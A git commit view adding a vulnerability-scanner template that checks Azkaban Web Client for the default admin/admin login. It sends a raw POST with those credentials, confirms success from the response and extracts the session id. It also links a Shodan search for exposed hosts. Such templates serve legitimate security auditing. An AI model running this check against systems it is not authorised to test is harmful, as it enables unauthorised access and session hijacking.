Merge pull request #2367 from pussycat0x/master

Azkaban Web Client Default Credential
patch-1
Sandeep Singh 2021-08-10 15:05:58 +05:30 committed by GitHub
commit 3eea01a8e0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 41 additions and 0 deletions

View File

@ -0,0 +1,41 @@
id: azkaban-web-client-default-creds
info:
name: Azkaban Web Client Default Credential
author: pussycat0x
severity: high
reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
tags: default-login,azkaban
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=login&username=admin&password=admin
matchers-condition: and
matchers:
- type: word
words:
- '"session.id"'
- '"success"'
condition: and
- type: word
words:
- 'azkaban.browser.session.id'
- 'application/json'
condition: and
part: header
- type: status
status:
- 200
extractors:
- type: kval
kval:
- azkaban.browser.session.id